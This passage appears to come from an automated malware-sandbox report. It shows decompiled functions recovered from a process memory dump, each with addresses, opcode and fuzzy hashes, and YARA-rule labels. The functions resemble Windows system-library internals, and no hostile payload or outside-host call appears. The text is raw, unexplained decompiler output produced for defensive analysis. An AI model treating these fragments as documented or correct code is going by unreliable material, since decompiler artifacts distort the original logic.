							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0361db64
0x0361db66
0x0361db6b
0x0361dbaa
0x0361db71
0x0361db76
0x0361db7a
0x0361dba3
0x0361db7c
0x0361db87
0x0361db8b
0x03674fa1
0x03674fb3
0x03674fb8
0x0361db91
0x0361db96
0x0361db98
0x0361db98
0x0361db8b
0x0361db7a
0x0361db9d
0x0361dba2

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 9e83c833229b6c02380a00bb095c1993e1a1bb5bab1e6e4f9207c0db0093f08d
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 14F0C2B76016229BD332EA558884B3BA6B98FD2B60F1E0039F5069B344CA60881386E4

Uniqueness

Uniqueness Score: -1.00%

Function 0361B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0361B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03637D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03637D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03697016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0361b1e8
0x0361b1ea
0x0361b1f3
0x03674a17
0x0361b1f9
0x0361b1f9
0x0361b1f9
0x0361b201
0x03674a21
0x03674a2e
0x00000000
0x00000000
0x03674a3b
0x03674a4d
0x03674a3d
0x03674a46
0x03674a46
0x03674a55
0x00000000
0x00000000
0x00000000
0x0361b20a
0x0361b20a
0x0361b20a
0x0361b20a

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 28d340caedce975079e76725de51da73071521ec81f50fc545952cf3d89797b1
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: AD01D1322006849BD322D75ED909F69BB98EF82754F0D00A5F914CB7B1DBB8C810C258

Uniqueness

Uniqueness Score: -1.00%

Function 036AFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E036AFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x370d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03637D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0365B640(E03659AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x036afe96
0x036afe9e
0x036afea1
0x036afead
0x036afeb3
0x036afeb9
0x036afec3
0x036afed5
0x036afec5
0x036afece
0x036afece
0x036afee0
0x036afee1
0x036afee3
0x036afee8
0x036afefb

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572dc56f6beb65695bd601b6a9250351122aa2799dafad65aac082cd99b6cef4
Instruction ID: 6dab8d6aa51740319d0e1b9377b385c80130c0bf7d9498778e3bc46ef98b30cb
Opcode Fuzzy Hash: 572dc56f6beb65695bd601b6a9250351122aa2799dafad65aac082cd99b6cef4
Instruction Fuzzy Hash: A6012C74A00208EFCB14DFA8D541A6AB7F4EF08304F144169A904DF382DA35D9018B55

Uniqueness

Uniqueness Score: -1.00%

Function 036E8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E036E8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x370d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03637D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0365B640(E03659AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x036e8f6a
0x036e8f79
0x036e8f81
0x036e8f84
0x036e8f8b
0x036e8f91
0x036e8f94
0x036e8f9e
0x036e8fb0
0x036e8fa0
0x036e8fa9
0x036e8fa9
0x036e8fbb
0x036e8fbc
0x036e8fbe
0x036e8fc3
0x036e8fd6

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617412d377af997c29cef0afe4e77b83f6f6f91a21304cbd1b7f296641cab3e
Instruction ID: b12a9449ebf479813960d63ad1b3c539fa88786b1aa0b75c8542f296f0cf3bfb
Opcode Fuzzy Hash: 2617412d377af997c29cef0afe4e77b83f6f6f91a21304cbd1b7f296641cab3e
Instruction Fuzzy Hash: B0013C74A0120CEFCB04EFA8D545AAEB7F4EF08700F108069B905EB380EB74DA00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 036D131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E036D131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x370d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03637D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0365B640(E03659AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x036d131b
0x036d132a
0x036d1330
0x036d1336
0x036d133e
0x036d1341
0x036d1344
0x036d134f
0x036d1361
0x036d1351
0x036d135a
0x036d135a
0x036d136c
0x036d136d
0x036d136f
0x036d1374
0x036d1387

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d75eb74c58498c10c771e03f7bda365bbed54be5c4c3e6ba754541a6a2c22d2
Instruction ID: c7e1ef077844486040f82be408495d7526a0902f60c1d400d2b2c98761af5189
Opcode Fuzzy Hash: 6d75eb74c58498c10c771e03f7bda365bbed54be5c4c3e6ba754541a6a2c22d2
Instruction Fuzzy Hash: 960119B5A0120CAFCB44EFA9D545AAEB7F4EF08700F008069F845EB381EA749A10CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036D1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E036D1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x370d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03637D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0365B640(E03659AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x036d1608
0x036d1617
0x036d161d
0x036d1625
0x036d1628
0x036d162b
0x036d1636
0x036d1648
0x036d1638
0x036d1641
0x036d1641
0x036d1653
0x036d1654
0x036d1656
0x036d165b
0x036d166e

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9c6bbf9ead94b9cf18041150622634e402529ca764b558e6f23b4283b97425d
Instruction ID: 4c371c50d881c8ac38781c06174bb70b2f19eb92c3eedf959643aeebb5eb326a
Opcode Fuzzy Hash: a9c6bbf9ead94b9cf18041150622634e402529ca764b558e6f23b4283b97425d
Instruction Fuzzy Hash: 2AF04975E05348EFCB14EFA8D555AAEB7F4EF09300F048069B905EB381EA749910CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0363C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0363C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0363C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x35f11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E036E88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0363c577
0x0363c57d
0x0363c581
0x0363c5b5
0x0363c5b9
0x0363c5ce
0x0363c5ce
0x0363c5ca
0x00000000
0x0363c5ca
0x0363c5c4
0x0363c5c8
0x00000000
0x00000000
0x00000000
0x0363c5ad
0x00000000
0x0363c5af

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7eae1972e991cf78f18fd1a47dcac830156ef7510c55215c6769e7739de6e7d
Instruction ID: ff27fe3cc920dfdaf5b480e3762c0bdc8b2916c7c44a8c76d26d497456134ee7
Opcode Fuzzy Hash: a7eae1972e991cf78f18fd1a47dcac830156ef7510c55215c6769e7739de6e7d
Instruction Fuzzy Hash: 20F0BEB29157949FD731EB68C204B22BBE8EF07770F5C84ABF406A7311C6A4D8A0C254

Uniqueness

Uniqueness Score: -1.00%

Function 0365927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0365927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0365FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E036592C6(_t11, _t14);
				}
				return _t11;
			}

0x03659295
0x03659299
0x0365929f
0x036592aa
0x036592ad
0x036592ae
0x036592af
0x036592b0
0x036592b4
0x036592bb
0x036592bb
0x036592c5

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 5fcb3b7c5dff83012a858fd7c73b4600b9719773862ca8af2a89e962dedf4414
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 64E09232350A40ABE761DE5ADC84F5777ADEF82B21F04407DB9045F282CBE6DD1987A8

Uniqueness

Uniqueness Score: -1.00%

Function 036E8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E036E8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x370d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03637D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0365B640(E03659AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x036e8d34
0x036e8d43
0x036e8d4b
0x036e8d4e
0x036e8d52
0x036e8d5c
0x036e8d6e
0x036e8d5e
0x036e8d67
0x036e8d67
0x036e8d79
0x036e8d7a
0x036e8d7c
0x036e8d81
0x036e8d94

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b40fea77698f9a1911a8b5815be8aaf27126b24e112ed227932d258ee2e64b3
Instruction ID: 49799cd4c404bb577af977595148ee981d2ebd0911baedebc9703ccbc4b3be89
Opcode Fuzzy Hash: 4b40fea77698f9a1911a8b5815be8aaf27126b24e112ed227932d258ee2e64b3
Instruction Fuzzy Hash: 01F03A75A05708AFDB14EBB8E545A6EB7B8EB18700F5080A9E905AB291EA34D9048B58

Uniqueness

Uniqueness Score: -1.00%

Function 036D2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E036D2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E036CFD22(__ecx);
				_t19 =  *0x370849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3708748; // 0x0
					if(__eflags <= 0) {
						E036D1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3708724 & 0x00000004;
							if(( *0x3708724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3708724; // 0x0
					return E036C8DF1(__ebx, 0xc0000374, 0x3705890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x036d2076
0x036d2078
0x036d207d
0x036d2083
0x036d20a4
0x036d20aa
0x036d20ac
0x036d20b7
0x036d20ba
0x036d20bc
0x036d20c9
0x036d20c9
0x036d20d0
0x036d20d2
0x00000000
0x036d20d2
0x036d20be
0x036d20c3
0x036d20c5
0x036d20c7
0x00000000
0x00000000
0x036d20c7
0x036d20bc
0x036d20d4
0x036d2085
0x036d2085
0x036d20a3
0x036d20a3

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc657438acc95cb0c8fb3e17e4fb45a6b108b4f34a235985ab74b2f35cd9bca
Instruction ID: 0a8899223b92917cf3560f93e1c0b01c1e1f35a546c97ec77b81b8e01fdb5090
Opcode Fuzzy Hash: afc657438acc95cb0c8fb3e17e4fb45a6b108b4f34a235985ab74b2f35cd9bca
Instruction Fuzzy Hash: F4F0202AC252D88ADF32EB2472212E12B88C786114B0D688DD8901B308C9388883CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 036E8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E036E8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x370d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03637D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0365B640(E03659AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x036e8b67
0x036e8b6f
0x036e8b72
0x036e8b7d
0x036e8b8f
0x036e8b7f
0x036e8b88
0x036e8b88
0x036e8b9a
0x036e8b9b
0x036e8b9d
0x036e8ba2
0x036e8bb5

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976e99c34cfaa976b9644fb20f3407a170dc964ba6fb9ad1034c41f3a29cd0f4
Instruction ID: ab0a09f1932fceb9641ffd759f0dc6ec36b21c19745bc1aee3ebe68a9e9af072
Opcode Fuzzy Hash: 976e99c34cfaa976b9644fb20f3407a170dc964ba6fb9ad1034c41f3a29cd0f4
Instruction Fuzzy Hash: 20F05EB4A05259ABDB14EBA8EA06A6EB3B4EB04700F040469B9159F380EB74D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 03614F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03614F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E036E88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0363C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x35f1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x03614f2e
0x03614f34
0x03614f38
0x03670b85
0x03670b85
0x03670b89
0x03670b9a
0x03670b9a
0x03670b9f
0x00000000
0x03670b9f
0x03670b94
0x03670b98
0x00000000
0x00000000
0x00000000
0x03670b98
0x03614f3e
0x03614f48
0x00000000
0x03614f6e
0x00000000
0x03614f70

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f3d46695a1d236f2201b5f997f67f622bdc032250b2321f8dfd097c041eff4
Instruction ID: 3cabc902230a5ffdc826ac8dd16d139cc78865feb58c5b64f4e47debba667442
Opcode Fuzzy Hash: 22f3d46695a1d236f2201b5f997f67f622bdc032250b2321f8dfd097c041eff4
Instruction Fuzzy Hash: C1F0E236526785CFD771D718C288B22B7F8AF00F7CF8844A5D4058BB60C725EE44C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 0363746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0363746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0362EB70(__ecx, 0x37079a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E036595D0();
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0363746d
0x0363746d
0x0363746d
0x03637471
0x03637488
0x0367f92d
0x0363748e
0x03637491
0x03637495
0x0367f937
0x0367f93a
0x0367f94e
0x0367f953
0x0367f956
0x0367f956
0x03637495
0x00000000
0x03637488
0x03637473
0x03637478
0x0363747d
0x03637481
0x00000000
0x03637481
0x0363747d
0x0363747a
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9460966834af44198c95be47c15180601301748cfe879005d685fc6faf739aaa
Instruction ID: efe01d9ed377a830d5f404a1400ec23fd7d77b729542837ff5b203c97c511b6c
Opcode Fuzzy Hash: 9460966834af44198c95be47c15180601301748cfe879005d685fc6faf739aaa
Instruction Fuzzy Hash: ABF0B474900284EACF01DB68C540F79BBB1AF06210F480159D8E1AF252E726A8018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 036E8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E036E8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x370d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03637D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0365B640(E03659AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x036e8ce5
0x036e8ced
0x036e8cf0
0x036e8cfb
0x036e8d0d
0x036e8cfd
0x036e8d06
0x036e8d06
0x036e8d18
0x036e8d19
0x036e8d1b
0x036e8d20
0x036e8d33

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ce6a220ab9ca14e25be5e183a66ba5d7ad60d85983ed406afee0777b5d3aa8
Instruction ID: 5aca3f3c164fbff53a9c7b144935c774881e21b7fbcafc46734af4a763a8423c
Opcode Fuzzy Hash: d7ce6a220ab9ca14e25be5e183a66ba5d7ad60d85983ed406afee0777b5d3aa8
Instruction Fuzzy Hash: 23F08275A05208EFCB04EBF8E945E6EB7B4EF09700F1441A9F915EB380EA34D904C758

Uniqueness

Uniqueness Score: -1.00%

Function 0364A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0364A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3707b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0365FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0364a44b
0x0364a453
0x0364a472
0x0364a476
0x00000000
0x0364a493
0x0364a47a
0x0364a47f
0x0364a486
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854d9d56147b1f7611d4060c774d325a44547790dc1ab6c3e33dfea89d3daa9a
Instruction ID: d3806019e435319e8b0b259511fcbd1982a891f11f78c2e3c2eb090ecea20588
Opcode Fuzzy Hash: 854d9d56147b1f7611d4060c774d325a44547790dc1ab6c3e33dfea89d3daa9a
Instruction Fuzzy Hash: ABE09272E41421EBD3129E58FD00F6AB39DDBD5A51F094039F904CB214DA68DD12C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 0361F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0361F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0364F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03634620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0361f35d
0x0361f361
0x0361f367
0x0361f372
0x0361f38c
0x0361f38c
0x0361f394

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

